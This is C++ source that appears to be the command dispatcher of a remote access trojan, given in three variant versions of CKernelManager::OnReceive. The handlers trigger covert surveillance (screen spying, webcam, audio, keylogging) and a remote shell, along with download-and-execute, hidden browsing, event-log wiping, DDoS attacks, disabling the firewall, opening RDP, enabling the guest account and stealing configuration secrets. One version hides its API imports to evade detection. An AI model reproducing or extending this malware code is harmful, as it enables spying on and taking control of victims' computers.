void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
switch (lpBuffer[0])
{
case COMMAND_LIST_DRIVE: // 文件管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, false);
break;
case COMMAND_SCREEN_SPY: // 屏幕查看
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_WEBCAM: // 摄像头
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SHELL: // 远程sehll
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_KEYBOARD:
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSTEM:
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_DOWN_EXEC: // 下载者
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
Sleep(100); // 传递参数用
break;
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
break;
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
break;
case COMMAND_REMOVE: // 卸载,
UnInstallService();
break;
case COMMAND_CLEAN_EVENT: // 清除日志
CleanEvent();
break;
case COMMAND_SESSION:
CSystemManager::ShutdownWindows(lpBuffer[1]);
break;
case COMMAND_RENAME_REMARK:
SetHostID((LPCTSTR)(lpBuffer + 1));
break;
case COMMAND_UPDATE_SERVER: // 更新服务端
if (UpdateServer((LPCTSTR)(lpBuffer + 1)))
UnInstallService();
break;
}
}
// 加上激活
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
typedef LONG (WINAPI *InterlockedExchangeT)
(
__inout LONG volatile *Target,
__in LONG Value
);
InterlockedExchangeT pInterlockedExchange = (InterlockedExchangeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"InterlockedExchange");
typedef VOID (WINAPI *SleepT)
(
__in DWORD dwMilliseconds
);
SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep");
typedef HANDLE
(WINAPI
*CreateThreadT)(
__in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes,
__in SIZE_T dwStackSize,
__in LPTHREAD_START_ROUTINE lpStartAddress,
__in_opt LPVOID lpParameter,
__in DWORD dwCreationFlags,
__out_opt LPDWORD lpThreadId
);
CreateThreadT pCreateThread=(CreateThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateThread");
typedef BOOL (WINAPI *CloseHandleT)
(
__in HANDLE hObject
);
char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);
typedef BOOL
(WINAPI
*EnumWindowsT)(
__in WNDENUMPROC lpEnumFunc,
__in LPARAM lParam);
EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),"EnumWindows");
switch (lpBuffer[0])
{
case COMMAND_ACTIVED:
pInterlockedExchange((LONG *)&m_bIsActived, true);
break;
case COMMAND_LIST_DRIVE: // 文件管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, false);
break;
case COMMAND_SCREEN_SPY: // 屏幕查看
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_WEBCAM: // 摄像头
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_AUDIO: // 声音监听
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SHELL: // 远程sehll
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_KEYBOARD: //键盘记录
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSTEM: //系统管理,包括进程,窗口
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SERMANAGER: // 服务管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SerManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_DDOS_ATTACK:
{
ATTACK m_Attack;
memcpy(&m_Attack,lpBuffer + 1,sizeof(ATTACK));
DDOSManager m_DDOSManager(&m_Attack);
}
break;
case COMMAND_DDOS_STOP:
Stoping = FALSE;
break;
case COMMAND_REGEDIT: //注册表管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_RegeditManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSINFO:
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SysInfoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_NET_USER: // 无NET加用户
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)NETUSER,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_OPEN_PROXY: // 开启代理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)OpenProxy,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_OPEN_3389:
{
Open3389((LPCTSTR)(lpBuffer + 1), nSize -2);
}
break;
case COMMAND_GUEST: // 开启GUEST账号
OpenGuest();
break;
case COMMAND_STOPFIRE: // 关防火墙
StopFire();
break;
case COMMAND_CHANGE_PORT: // 更改终端
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)ChangePort, (LPVOID)(lpBuffer + 1), 0, NULL, true);
break;
case COMMAND_SENDMSG:
{
pCloseHandle(pCreateThread(NULL,NULL,Loop_MsgBox,&lpBuffer[1],NULL,NULL));
pSleep(500);
}
break;
case COMMAND_DOWN_EXEC: // 下载者
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
pSleep(100); // 传递参数用
break;
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
break;
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
break;
case COMMAND_REMOVE: // 卸载,
UnInstallService();
break;
case COMMAND_CLEAN_EVENT: // 清除日志
CleanEvent();
break;
case COMMAND_SESSION://会话管理
CSystemManager::ShutdownWindows(lpBuffer[1]);
break;
case COMMAND_RENAME_REMARK: // 改备注
SetHostID((LPCTSTR)(lpBuffer + 1));
break;
case COMMAND_CHANGE_GROUP: // 改分组
SetInfo("Group", (LPCTSTR)(lpBuffer + 1), "BITS");
break;
case COMMAND_UPDATE_SERVER: // 更新服务端
if (UpdateServer((char *)lpBuffer + 1))
UnInstallService();
break;
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
break;
case COMMAND_SORT_PROCESS: // 进程筛选
try
{
if (isProcesin((LPTSTR)(lpBuffer + 1)))
{
BYTE bToken = TOKEN_INFO_YES;
m_pClient->Send(&bToken, 1);
}else
{
BYTE bToken = TOKEN_INFO_NO;
m_pClient->Send(&bToken, 1);
}
}catch(...){}
break;
case COMMAND_SORT_WINDOW: // 窗体筛选
try
{
strcpy(temp_proc,(LPTSTR)(lpBuffer + 1));
pEnumWindows(EnumWindowsList,0);
if (proc_tag)
{
BYTE bToken = TOKEN_INFO_YES;
m_pClient->Send(&bToken, 1);
proc_tag = false;
}else
{
BYTE bToken = TOKEN_INFO_NO;
m_pClient->Send(&bToken, 1);
}
}catch(...){}
break;
}
}
// 加上激活
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
static int dwTime=0;
pcmd_plugin cmd=NULL;
switch (lpBuffer[0])
{
case COMMAND_ACTIVED:
LOG((LEVEL_INFO,"COMMAND_ACTIVED:%d\n",nSize));
{
if ( lstrlen(CKeyboardManager::ConnPass) == 0 )//判断自身密码是否为空,空则跳过验证
{
if ( m_pClient->bSendLogin )//判断是否重复发送,测试的时候会上2次
{
sendLoginInfo_true( m_strServiceName, m_pClient, (GetTickCount() - CKeyboardManager::dwTickCount)/2 );
m_pClient->bSendLogin = FALSE;
}
InterlockedExchange((LONG *)&m_bIsActived, TRUE);
}
else//不为空
{
char Pass[256] = {0};
memcpy( Pass, lpBuffer + 1, 200 );
if ( lstrcmpi( CKeyboardManager::ConnPass, Pass ) == 0 )//开始验证
{
if ( m_pClient->bSendLogin )//判断是否重复发送,测试的时候会上2次
{
sendLoginInfo_true( m_strServiceName, m_pClient, (GetTickCount() - CKeyboardManager::dwTickCount)/2 );
m_pClient->bSendLogin = FALSE;
}
InterlockedExchange((LONG *)&m_bIsActived, TRUE);//符合,则激活
}
else
{
InterlockedExchange((LONG *)&m_bIsActived, FALSE);//不符合,则不激活
}
}
}
break;
case COMMAND_LIST_DRIVE: // 文件管理
LOG((LEVEL_INFO,"COMMAND_LIST_DRIVE:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, (LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
break;
case COMMAND_SCREEN_SPY: // 屏幕查看
LOG((LEVEL_INFO,"COMMAND_SCREEN_SPY:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,(LPVOID)m_pClient->m_Socket, 0, NULL, TRUE);
break;
case COMMAND_WEBCAM: // 摄像头
LOG((LEVEL_INFO,"COMMAND_WEBCAM:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
break;
case COMMAND_AUDIO: // 语音
LOG((LEVEL_INFO,"COMMAND_AUDIO:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
break;
case COMMAND_SHELL: // 远程sehll
LOG((LEVEL_INFO,"COMMAND_SHELL:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, (LPVOID)m_pClient->m_Socket, 0, NULL, TRUE);
break;
case COMMAND_KEYBOARD:
LOG((LEVEL_INFO,"COMMAND_KEYBOARD:%d\n",nSize));
//2011/04/29 -yx
//dwTime=0;
// if (!dwTime)
// {
// m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_HookKeyboard, (LPVOID)(lpBuffer+1), 0, NULL, TRUE); //2011/04/29 yx
// dwTime++;
// }
//
// m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
break;
case COMMAND_SYSTEM:
LOG((LEVEL_INFO,"COMMAND_SYSTEM:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
break;
case COMMAND_DOWN_EXEC: // 下载者
LOG((LEVEL_INFO,"COMMAND_DOWN_EXEC:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
SleepEx(101,0); // 传递参数用
break;
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
LOG((LEVEL_INFO,"COMMAND_OPEN_URL_SHOW:%d\n",nSize));
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
break;
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
LOG((LEVEL_INFO,"COMMAND_OPEN_URL_HIDE:%d\n",nSize));
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
break;
case COMMAND_REMOVE: // 卸载,
{
LOG((LEVEL_INFO,"COMMAND_REMOVE:%d\n",nSize));
// liucw add 2013.07.25
// //停止并删除插件
GLOBAL_PLUGSERVER->SetSocket(m_pClient);
GLOBAL_PLUGSERVER->OnPluginRemove(0,0);
// 卸载
UnInstallService();
break;
}
case COMMAND_CLEAN_EVENT: // 清除日志
LOG((LEVEL_INFO,"COMMAND_CLEAN_EVENT:%d\n",nSize));
{
CleanEvent();
}
break;
case COMMAND_SESSION:
LOG((LEVEL_INFO,"COMMAND_SESSION:%d\n",nSize));
CSystemManager::ShutdownWindows(lpBuffer[1]);
break;
case COMMAND_RENAME_REMARK: // 改备注
LOG((LEVEL_INFO,"COMMAND_RENAME_REMARK:%d\n",nSize));
SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
break;
case COMMAND_UPDATE_SERVER: // 更新服务端
LOG((LEVEL_INFO,"COMMAND_UPDATE_SERVER:%d\n",nSize));
if (UpdateServer((char *)lpBuffer + 1))
UnInstallService();
break;
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
((CManager*)this)->m_pClient->dwHeartTime=0;
break;
case COMMAND_DDOS:
LOG((LEVEL_INFO,"COMMAND_DDOS:%d\n",nSize));
// if ( !Gobal_DDOS_Running )
// {
// m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DDOS_Attacker, (LPVOID)lpBuffer, 0, NULL, TRUE);
// SleepEx(110,0);//传递参数用
// }
break;
case COMMAND_DDOS_STOP:
LOG((LEVEL_INFO,"COMMAND_DDOS_STOP:%d\n",nSize));
//DDOS_Stop();
break;
case COMMAND_HIT_HARD:
LOG((LEVEL_INFO,"COMMAND_HIT_HARD:%d\n",nSize));
// KillMBR();
break;
case COMMAND_OPEN_3389:
LOG((LEVEL_INFO,"COMMAND_OPEN_3389:%d\n",nSize));
Open3389();
break;
case COMMAND_CHAJIAN: // 下载插件
LOG((LEVEL_INFO,"COMMAND_CHAJIAN:%d\n",nSize));
//m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
SleepEx(110,0); // 传递参数用
break;
case COMMAND_SERECT_CFG: // 密取配置
LOG((LEVEL_INFO,"COMMAND_SERECT_CFG:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SecretCfg,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
break;
case COMMAND_CHAJIAN_FORMIQU: //
LOG((LEVEL_INFO,"COMMAND_CHAJIAN_FORMIQU:%d\n",nSize));
// printf((char*)(lpBuffer + 1));
m_pObjEvidence->PassBackFileList((char*)(lpBuffer + 1),0);
// m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN_MIQU,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
// SleepEx(110,0); // 传递参数用
break;
case TOKEN_EVIDENCE_SREECN_ARG: // 下载插件
LOG((LEVEL_INFO,"TOKEN_EVIDENCE_SREECN_ARG:%d\n",nSize));
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN_MIQU,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
SleepEx(110,0); // 传递参数用
break;
case COMMAND_PLUGIN_REQUEST: // 2.0插件下载
LOG((LEVEL_INFO,"收到COMMAND_PLUGIN_REQUEST,buff大小:%d(%x) .\n",nSize,nSize));
cmd=new cmd_plugin;
if (!cmd)
{
break;
}
cmd->Clientsocket=m_pClient;
cmd->nSize=nSize-1;
cmd->lpBuffer=lpBuffer+1;
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_Plugin_Request,(LPVOID)(cmd), 0, NULL, TRUE);
break;
// {
// ++lpBuffer;
// --nSize;
//
// // 每次都应该设置一下,防止丢掉
// GLOBAL_PLUGSERVER->SetSocket(m_pClient);
// int ret = GLOBAL_PLUGSERVER->OnPluginRequest(lpBuffer,nSize);
// if( ret != 0 )
// {
// LOG((LEVEL_WARNNING,"处理插件下载命令错,ret=%d",ret));
// }
// GLOBAL_PLUGSERVER->ProcessConfig();
//
// break;
//
// }
case COMMAND_ONLINE_ERROR:
{
LOG((LEVEL_INFO,"上线时发送错误.\n"));
m_pClient->Disconnect();
break;
}
default:
LOG((LEVEL_ERROR,"UNKNOWN COMMAND:%d(%x)\n",lpBuffer[0],lpBuffer[0]));
break;
}
}
CEventService::~CEventService()
{
CleanEvent();
}
